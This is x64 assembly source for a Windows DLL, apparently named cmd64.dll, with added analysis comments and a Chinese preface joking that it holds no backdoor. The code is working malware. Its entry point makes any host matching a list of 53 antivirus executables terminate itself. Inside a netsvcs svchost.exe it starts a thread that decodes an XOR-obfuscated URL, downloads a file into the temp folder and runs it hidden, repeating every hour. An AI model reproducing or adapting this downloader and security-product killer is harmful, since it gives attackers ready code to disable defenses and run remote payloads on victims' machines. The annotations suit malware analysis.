蓝屏重启是正常现象。我保证绝对没有后门。我对灯发誓,如果有后门,立刻就没电。
includelib G:\RadASM\Masm64\SDK\Lib\kernel32.lib
includelib G:\RadASM\Masm64\SDK\Lib\user32.lib
includelib G:\RadASM\Masm64\SDK\Lib\urlmon.lib
includelib G:\RadASM\Masm64\SDK\Lib\Shlwapi.lib
EXTERN CreateThread :proc
EXTERN DisableThreadLibraryCalls :proc
EXTERN Sleep :proc
EXTERN LoadLibraryA :proc
; EXTERN URLDownloadToFileA :proc
EXTERN GetFileAttributesA :proc
EXTERN WinExec :proc
EXTERN GetTempPathA :proc
EXTERN GetTempFileNameA :proc
EXTERN GetModuleFileNameA :proc
EXTERN GetProcAddress :proc
; EXTERN CreateMutexA :proc
EXTERN CloseHandle :proc
EXTERN DeleteFileA :proc
EXTERN ExitProcess :proc
EXTERN PathFindFileNameA :proc
EXTERN GetCommandLineA :proc
EXTERN StrStrIA :proc
; EXTERN MessageBoxA :proc
EXTERN QueueUserWorkItem :proc
EXTERN GetModuleHandleA :proc
.data
; --- Downloader configuration (consumed by XIAZAI) ---
; URL is a 4-byte placeholder followed by an 80-byte zero pad. XIAZAI copies
; it to the stack XOR-ing every byte with 15h until the first NUL (at most
; 76 bytes), so this slot is sized for an obfuscated URL to be patched in.
; NOTE(review): as shipped, "1111" XOR 15h decodes to "$$$$", which is not a
; usable URL — this listing looks like a template patched after build; confirm.
URL db "1111",0
db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
; Names resolved at run time with LoadLibraryA / GetModuleHandleA +
; GetProcAddress, so URLDownloadToFileA and _stricmp are absent from the
; DLL's import table (the matching EXTERN lines above are commented out).
Urlmon db "Urlmon.dll",0
URLDown db "URLDownloadToFileA",0
stricmp db "_stricmp",0 ; resolved from ntdll.dll by kiil
ntdll db "ntdll.dll",0
; Host-process gate used by kiil: only a svchost.exe whose command line
; contains "netsvcs" gets the download thread.
netsvcs db "netsvcs",0
svchost db "svchost.exe",0
; --- Process-name blocklist (53 entries, collected into a table by kiil) ---
; When the host executable's base name matches one of these
; (case-insensitive), kiil calls ExitProcess(0). Vendor labels below are the
; original author's comments, translated; entries without a label had none.
XueTr db "XueTr.exe",0
PowerTool db "PowerTool.exe",0
UfSeAgnt db "UfSeAgnt.exe",0 ; Trend Micro
TMBMSRV db "TMBMSRV.exe",0 ; Trend Micro
SfCtlCom db "SfCtlCom.exe",0 ; Trend Micro
TmProxy db "TmProxy.exe",0 ; Trend Micro
bdagent db "bdagent.exe",0 ; "Romanian antivirus" (original comment)
livesrv db "livesrv.exe",0 ; "Romanian antivirus" online-update component (original comment)
seccenter db "seccenter.exe",0 ; "Romanian antivirus" (original comment)
vsserv db "vsserv.exe",0 ; "Romanian antivirus" (original comment)
MPSVC db "MPSVC.exe",0 ; Micropoint Active Defense
MPSVC1 db "MPSVC1.exe",0
MPSVC2 db "MPSVC2.exe",0
MPMon db "MPMon.exe",0 ; Micropoint Active Defense
ast db "ast.exe",0 ; "超级巡警" (Chinese security tool)
xiufu db "gmer.exe",0
avp db "avp.exe",0 ; Kaspersky
egui db "egui.exe",0 ; ESET NOD32
ccSvcHst db "ccSvcHst.exe",0 ; Norton
mcagent db "mcagent.exe",0 ; McAfee
mcmscsvc db "mcmscsvc.exe",0
McNASvc db "McNASvc.exe",0
Mcods db "Mcods.exe",0
McProxy db "McProxy.exe",0
Mcshield db "Mcshield.exe",0
mcsysmon db "mcsysmon.exe",0
mcvsshld db "mcvsshld.exe",0
MpfSrv db "MpfSrv.exe",0
McSACore db "McSACore.exe",0
msksrver db "msksrver.exe",0
sched db "sched.exe",0 ; Avira ("小红伞")
avguard db "avguard.exe",0
avmailc db "avmailc.exe",0
avwebgrd db "avwebgrd.exe",0
avgnt db "avgnt.exe",0
avcenter db "avcenter.exe",0
afwServ db "afwServ.exe",0
AvastUI db "AvastUI.exe",0
FilMsg db "FilMsg.exe",0 ; Fil ("费尔")
Twister db "Twister.exe",0
dwengine db "dwengine.exe",0 ; "大蜘蛛" (Dr.Web)
spidernt db "spidernt.exe",0 ; "驱逐舰" (Chinese AV product)
spiderui db "spiderui.exe",0
spideragent db "spideragent.exe",0
SpIDerMl db "SpIDerMl.exe",0
avfwsvc db "avfwsvc.exe",0
avshadow db "avshadow.exe",0 ; Avira ("小红伞")
avgcsrvx db "avgcsrvx.exe",0 ; AVG
avgemc db "avgemc.exe",0
avgnsx db "avgnsx.exe",0
avgrsx db "avgrsx.exe",0
avgtray db "avgtray.exe",0
avgwdsvc db "avgwdsvc.exe",0
; --- Globals ---
Hstricmp QWORD 0 ; address of ntdll!_stricmp, written by kiil and used for every name comparison
hInst QWORD 0 ; the three DLL entry-point arguments, copied here by Entry
reason QWORD 0
reserved1 QWORD 0
.code
;-----------------------------------------------------------------------
; BOOL Entry(HINSTANCE hInst, DWORD reason, LPVOID reserved)
; DLL entry point (DllMain-style), Microsoft x64 ABI: args in rcx/rdx/r8.
; Annotated for analysis — this is the entry of a downloader/AV-killer DLL.
; Behaviour:
;   reason == 1 (DLL_PROCESS_ATTACH): tail-calls kiil and returns its rax.
;     kiil does not return when the host is a listed security product
;     (it calls ExitProcess), returns 1 when the host is a "netsvcs"
;     svchost.exe (download thread started) and 0 otherwise — per DllMain
;     convention a 0 from PROCESS_ATTACH makes the load fail, so the DLL is
;     unloaded from non-target processes.
;   any other reason: DisableThreadLibraryCalls(hInst), returns 1.
; Side effect: the three arguments are copied to the globals
; hInst / reason / reserved1.
; NOTE(review): only 16 bytes are reserved below the saved rbp before the
; calls, but the Microsoft x64 ABI requires a 32-byte shadow space at every
; call; a callee that spills its register arguments can overwrite the saved
; rbp / return address here.
; NOTE(review): reason is a DWORD, yet it is stored and compared as a full
; 64-bit value; the ABI does not guarantee the upper 32 bits of rdx are zero.
;-----------------------------------------------------------------------
Entry proc ;hInst:qword, reason:qword, reserved1:qword
push rbp
mov rbp,rsp
mov hInst,rcx ; stash the entry-point arguments in globals
mov reason,rdx
mov reserved1,r8
sub rsp,10h ; reserve 16 bytes only (see NOTE above: smaller than the required shadow space)
and spl,0F0H ; round rsp down to 16; a no-op if the loader entered with an ABI-aligned stack
cmp reason,1 ; DLL_PROCESS_ATTACH
jnz @1
call kiil ; rax = 0 or 1 from kiil; kiil may also terminate the process
jmp @2
@1:
mov rcx,hInst
call DisableThreadLibraryCalls ; suppress DLL_THREAD_ATTACH / DLL_THREAD_DETACH notifications for this module
push 1
pop rax ; return TRUE for every non-attach reason
@2:
mov rsp,rbp
pop rbp
ret
Entry Endp
;-----------------------------------------------------------------------
; DWORD XIAZAI(PVOID context)      ("xiazai" = download)
; Thread-pool work item queued by XIANCHENG; the context argument is
; ignored. Never returns — the trailing ret is unreachable — and loops:
;   1. Sleep(60000), then resolve Urlmon!URLDownloadToFileA by name
;      (neither LoadLibraryA nor GetProcAddress result is NULL-checked).
;   2. Decode the global URL into the local _URL: each byte XOR 15h up to
;      the first NUL, at most 76 bytes, then a 16-bit zero terminator.
;   3. Create an empty temp file (GetTempPathA + GetTempFileNameA; the
;      resulting path overwrites TempPath in place).
;   4. URLDownloadToFileA(NULL, _URL, TempPath, 0, NULL). On a non-zero
;      HRESULT, or if the file does not exist afterwards, retry every
;      10 s with the same temp file. On success WinExec(TempPath, 0) —
;      i.e. SW_HIDE — wait 60 s, DeleteFileA(TempPath), sleep 3600000 ms
;      (1 h) and restart from step 3 with a fresh temp file.
; Clobbers rbx (callee-saved in the Microsoft x64 ABI) without saving it.
; Indicators grounded in this code: XOR key 15h, 60 s / 10 s / 1 h sleeps,
; a %TEMP% file created by GetTempFileNameA and then executed via WinExec.
;-----------------------------------------------------------------------
XIAZAI proc
LOCAL _URL[80] :BYTE ; decoded (plain-text) URL
LOCAL lpHandles : QWORD ; flag: 1 once a download has been executed in this cycle
LOCAL IpURLDown : QWORD ; address of URLDownloadToFileA
LOCAL TempPath[260] :BYTE ; temp directory, then the temp file path
sub rsp,30h ; outgoing-argument area: 32-byte shadow space + one stack argument
and spl,0F0H
mov rcx,60000
call Sleep ; initial 60 000 ms delay
lea rcx,Urlmon
call LoadLibraryA
mov rcx,rax ; NOTE(review): used without a NULL check
lea rdx,URLDown
call GetProcAddress
mov IpURLDown,rax ; NOTE(review): also unchecked; a NULL here faults at the indirect call below
; Decode loop: _URL[i] = URL[i] ^ 15h while URL[i] != 0 and i < 76.
lea rbx, URL
lea rdx,_URL
mov rcx,76 ; byte budget (buffer is 80; two more bytes are written after the loop)
@w:
mov r8b,[rbx]
cmp r8b,0
jz @r ; stop at the first NUL of the encoded string
xor r8b,15h ; obfuscation key
mov [rdx],r8b
inc rbx
inc rdx
loop @w ; rcx counts down the byte budget
@r:
xor r8w,r8w
mov [rdx],r8w ; 16-bit zero terminator after the last decoded byte
@9: ; start of an hourly cycle
mov lpHandles ,0
mov rcx,260
lea rdx,TempPath
call GetTempPathA ; TempPath = temp directory
lea rcx,TempPath ; lpPathName
xor rdx,rdx ; lpPrefixString = NULL  (NOTE(review): whether the API accepts NULL here is not verified)
xor r8,r8 ; uUnique = 0 -> per the API contract the file is created now
lea r9,TempPath ; lpTempFileName: written over the same buffer
call GetTempFileNameA
@6: ; retry point for a failed download (same temp file)
xor rcx,rcx ; pCaller = NULL
lea rdx,_URL ; szURL = decoded URL
lea r8,TempPath ; szFileName = temp file
xor r9,r9 ; dwReserved = 0
mov [rsp+4*8],r9 ; lpfnCB = NULL (5th argument, first slot above the shadow space)
call IpURLDown ; URLDownloadToFileA(...) -> HRESULT in eax
OR EAX,EAX
jnz @3 ; anything but S_OK: wait and retry
lea rcx, TempPath
call GetFileAttributesA ; confirm the downloaded file exists
cmp EAX, -1 ; INVALID_FILE_ATTRIBUTES
je @3
lea rcx, TempPath
mov rdx,0 ; uCmdShow = 0 (SW_HIDE)
call WinExec ; execute the downloaded file hidden; result ignored
mov lpHandles ,1
mov rcx,60000
call Sleep ; 60 s, then remove the dropped file
lea rcx,TempPath
call DeleteFileA ; result ignored
@3:
mov rcx,10000
call Sleep ; 10 s between attempts
cmp lpHandles ,1
je @5
jmp @6 ; nothing executed yet this cycle: retry the download
@5:
mov rcx,3600000
call Sleep ; 1 h, then a new cycle with a fresh temp file
jmp @9
ret ; unreachable
XIAZAI endp
;-----------------------------------------------------------------------
; QWORD kiil()      — called by Entry on DLL_PROCESS_ATTACH
; 1. Builds shuzu, a NULL-terminated table of 53 pointers to the process
;    names in .data (slot 53 is the terminator).
; 2. Resolves ntdll!_stricmp into the global Hstricmp (unchecked).
; 3. Gets the host executable's path (GetModuleFileNameA with hModule =
;    NULL), its base name (PathFindFileNameA) and the command line.
; 4. If the base name equals any table entry (case-insensitive), calls
;    ExitProcess(0): the host — a listed security product — terminates
;    itself.
; 5. Otherwise, if the base name is "svchost.exe" and the command line
;    contains "netsvcs" (StrStrIA), creates a thread running XIANCHENG,
;    closes the handle at once and returns 1; else returns 0.
; NOTE(review): _stricmp returns a 32-bit int in eax, but both compares
; test the full rax (`cmp rax,0`); stale upper bits would turn a match into
; a mismatch.
; NOTE(review): this runs inside the DLL entry point, so per DllMain rules
; the thread created in step 5 cannot start until Entry returns.
;-----------------------------------------------------------------------
kiil proc
LOCAL Gfilename [260] :BYTE ; full path of the host executable
LOCAL shuzu [54] :QWORD ; table of name pointers, NULL-terminated
LOCAL Command :QWORD ; pointer to the process command line
LOCAL ssss :QWORD ; pointer to the host's base name (inside Gfilename)
LOCAL pppp :QWORD ; cursor into shuzu during the match loop
sub rsp,30h ; 32-byte shadow space + two stack arguments (CreateThread takes six)
and spl,0F0h
; Populate shuzu[0..52] with the blocklist entries from .data.
mov rax,offset avgwdsvc
mov shuzu ,rax
mov rax,offset avgtray
mov shuzu+1*8, rax
mov rax,offset avgrsx
mov shuzu+2*8, rax
mov rax,offset avgnsx
mov shuzu+3*8, rax
mov rax,offset XueTr
mov shuzu+4*8, rax
mov rax,offset PowerTool
mov shuzu+5*8, rax
mov rax,offset UfSeAgnt
mov shuzu+6*8, rax
mov rax,offset TMBMSRV
mov shuzu+7*8, rax
mov rax,offset SfCtlCom
mov shuzu+8*8, rax
mov rax,offset TmProxy
mov shuzu+9*8, rax
mov rax,offset avshadow
mov shuzu+10*8, rax
mov rax,offset avgcsrvx
mov shuzu+11*8, rax
mov rax,offset avgemc
mov shuzu+12*8, rax
mov rax,offset bdagent
mov shuzu+13*8, rax
mov rax,offset livesrv
mov shuzu+14*8, rax
mov rax,offset seccenter
mov shuzu+15*8, rax
mov rax,offset vsserv
mov shuzu+16*8, rax
mov rax,offset MPSVC
mov shuzu+17*8, rax
mov rax,offset MPSVC1
mov shuzu+18*8, rax
mov rax,offset MPSVC2
mov shuzu+19*8, rax
mov rax,offset MPMon
mov shuzu+20*8, rax
mov rax,offset ast
mov shuzu+21*8, rax
mov rax,offset avfwsvc
mov shuzu+22*8, rax
mov rax,offset xiufu
mov shuzu+23*8, rax
mov rax,offset avp
mov shuzu+24*8, rax
mov rax,offset spidernt
mov shuzu+25*8, rax
mov rax,offset spiderui
mov shuzu+26*8, rax
mov rax,offset spideragent
mov shuzu+27*8, rax
mov rax,offset SpIDerMl
mov shuzu+28*8, rax
mov rax,offset Twister
mov shuzu+29*8, rax
mov rax,offset dwengine
mov shuzu+30*8, rax
mov rax,offset egui
mov shuzu+31*8, rax
mov rax,offset ccSvcHst
mov shuzu+32*8, rax
mov rax,offset mcagent
mov shuzu+33*8, rax
mov rax,offset mcmscsvc
mov shuzu+34*8, rax
mov rax,offset McNASvc
mov shuzu+35*8, rax
mov rax,offset Mcods
mov shuzu+36*8, rax
mov rax,offset McProxy
mov shuzu+37*8, rax
mov rax,offset Mcshield
mov shuzu+38*8, rax
mov rax,offset mcsysmon
mov shuzu+39*8, rax
mov rax,offset mcvsshld
mov shuzu+40*8, rax
mov rax,offset MpfSrv
mov shuzu+41*8, rax
mov rax,offset McSACore
mov shuzu+42*8, rax
mov rax,offset msksrver
mov shuzu+43*8, rax
mov rax,offset sched
mov shuzu+44*8, rax
mov rax,offset avguard
mov shuzu+45*8, rax
mov rax,offset avmailc
mov shuzu+46*8, rax
mov rax,offset avwebgrd
mov shuzu+47*8, rax
mov rax,offset avgnt
mov shuzu+48*8, rax
mov rax,offset avcenter
mov shuzu+49*8, rax
mov rax,offset afwServ
mov shuzu+50*8, rax
mov rax,offset AvastUI
mov shuzu+51*8, rax
mov rax,offset FilMsg
mov shuzu+52*8, rax
xor rax,rax
mov shuzu+53*8,rax ; NULL terminator for the table walk below
lea rcx,ntdll
call GetModuleHandleA ; result not NULL-checked
mov rcx,rax
lea rdx,stricmp
call GetProcAddress
mov Hstricmp,rax ; NOTE(review): unchecked; a NULL faults at the first comparison
xor rcx,rcx ; hModule = NULL -> path of the current process's executable
lea rdx,Gfilename
mov r8,260
call GetModuleFileNameA
lea rcx,Gfilename
call PathFindFileNameA ; -> pointer to the base-name part of Gfilename
mov ssss ,rax
call GetCommandLineA
mov Command,rax
lea rax,shuzu
mov pppp,rax ; start the table walk at shuzu[0]
@4: mov rdx, ssss ; _stricmp(table entry, host base name)
mov rax, pppp
mov rcx,[rax]
call Hstricmp
cmp rax,0 ; 0 = names equal (see NOTE(review) in the header about rax vs eax)
jnz @3
xor rcx,rcx
call ExitProcess ; host is a listed security product: terminate it with exit code 0
@3: add pppp,8 ; next table entry
mov rax,pppp
cmp QWORD ptr [rax],0 ; stop at the NULL terminator
jnz @4
lea rcx,svchost
mov rdx, ssss
call Hstricmp ; is the host svchost.exe?
cmp rax,0
jnz @8
mov rcx,Command
lea rdx,netsvcs
call StrStrIA ; ...whose command line mentions the netsvcs group?
test rax,rax
je @8
xor rcx,rcx ; lpThreadAttributes = NULL
xor rdx,rdx ; dwStackSize = 0
lea r8,XIANCHENG ; lpStartAddress
xor r9,r9 ; lpParameter = NULL
mov [rsp+4*8],r9 ; dwCreationFlags = 0
mov [rsp+5*8],r9 ; lpThreadId = NULL
call CreateThread ; start the download chain; return value not checked
mov rcx,rax
call CloseHandle ; the handle is dropped; the thread keeps running
mov rax,1 ; target host: Entry reports success
jmp @s
@8:
xor rax,rax ; not a target host: Entry returns 0
@s:
ret
kiil endp
;-----------------------------------------------------------------------
; DWORD XIANCHENG(LPVOID param)   ("xiancheng" = thread) — CreateThread entry
; Hands XIAZAI to the thread pool with
; QueueUserWorkItem(XIAZAI, NULL, WT_EXECUTELONGFUNCTION) and returns; the
; thread's exit code is whatever BOOL QueueUserWorkItem left in rax
; (not checked). Because XIAZAI never returns, that work item occupies a
; pool thread for the life of the process.
;-----------------------------------------------------------------------
XIANCHENG proc
push rbp
mov rbp,rsp
sub rsp,20h ; 32-byte shadow space for the call below
and spl,0F0h
lea rcx,XIAZAI ; Function
xor rdx,rdx ; Context = NULL (XIAZAI ignores it)
mov r8,10h ;WT_EXECUTELONGFUNCTION — hint to the pool that the callback is long-running
call QueueUserWorkItem
mov rsp,rbp
pop rbp
ret
XIANCHENG endp
END
这个是cmd64.dll的源代码。(This is the source of cmd64.dll: a 64-bit DLL whose entry point exits the host process when its name matches a list of security-product executables, and, when loaded into a "netsvcs" svchost.exe, starts a thread that repeatedly downloads a file from an XOR-obfuscated URL with URLDownloadToFileA and runs it via WinExec. Listed here for analysis only.)